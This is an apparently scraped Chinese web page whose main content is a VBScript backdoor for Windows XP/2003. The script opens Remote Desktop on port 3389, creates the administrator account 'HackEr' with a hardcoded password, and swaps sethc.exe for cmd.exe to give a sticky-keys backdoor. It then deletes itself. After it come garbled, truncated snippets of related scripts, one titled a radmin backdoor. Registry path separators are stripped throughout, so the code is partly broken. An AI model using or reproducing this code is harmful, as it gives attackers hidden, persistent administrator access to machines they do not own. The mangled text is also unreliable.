xp、2003开3389+非net创建管理用户+Shift后门+自删除脚本vbs
on error resume next
const HKEY_LOCAL_MACHINE = &H80000002
strComputer = "."
Set StdOut = WScript.StdOut
Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\" &_
strComputer & "rootdefault:StdRegProv")
strKeyPath = "SYSTEMCurrentControlSetControlTerminal Server"
oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEMCurrentControlSetControlTerminal ServerWdsrdpwdTdstcp"
oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp"
strKeyPath = "SYSTEMCurrentControlSetControlTerminal Server"
strValueName = "fDenyTSConnections"
dwValue = 0
oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
strKeyPath = "SYSTEMCurrentControlSetControlTerminal ServerWdsrdpwdTdstcp"
strValueName = "PortNumber"
dwValue = 3389
oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
strKeyPath = "SYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp"
strValueName = "PortNumber"
dwValue = 3389
oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
on error resume next
dim username,password:If Wscript.Arguments.Count Then:username=Wscript.Arguments(0):password=Wscript.Arguments(1):Else:username="HackEr":password="393214425":end if:set wsnetwork=CreateObject("WSCRIPT.NETWORK"):os="WinNT://"&wsnetwork.ComputerName:Set ob=GetObject(os):Set oe=GetObject(os&"/Administrators,group"):Set od=ob.Create("user",username):od.SetPassword password:od.SetInfo:Set of=GetObject(os&"/"&username&",user"):oe.Add(of.ADsPath)'wscript.echo of.ADsPath
On Error Resume Next
Dim obj, success
Set obj = CreateObject("WScript.Shell")
success = obj.run("cmd /c takeown /f %SystemRoot%system32sethc.exe&echo y| cacls %SystemRoot%system32sethc.exe /G %USERNAME%:F© %SystemRoot%system32cmd.exe %SystemRoot%system32acmd.exe© %SystemRoot%system32sethc.exe %SystemRoot%system32asethc.exe&del %SystemRoot%system32sethc.exe&ren %SystemRoot%system32acmd.exe sethc.exe", 0, True)
CreateObject("Scripting.FileSystemObject").DeleteFile(WScript.ScriptName)
Vbs脚本实现radmin终极后门代码_删除自身
onerrorresumenextconstHKEY_LOCAL_MACHINE=&H80000002strComputer="."SetStdOut=WScript.StdOutSetoReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\"&_strComputer&"rootdefault:StdRegProv")strKe
vbs实现恢复暂停的自动启动服务的脚本
strComputer="."SetobjWMIService=GetObject("winmgmts:"_&"{impersonationLevel=impersonate}!\"&strComputer&"rootcimv2")SetcolListOfServices=objWMIService.ExecQuery_("Select*fromWin32_ServiceWhereState
vbs删除注册表项的代码
WScript.Echo"EnablingKerberosLogging..."constHKEY_LOCAL_MACHINE=&H80000002strComputer="."SetoReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\"&_strComputer&"rootdefault:StdRegProv")strKey
编辑:广州明生医药有限公司
标签:脚本,代码,后门,注册表,自动启动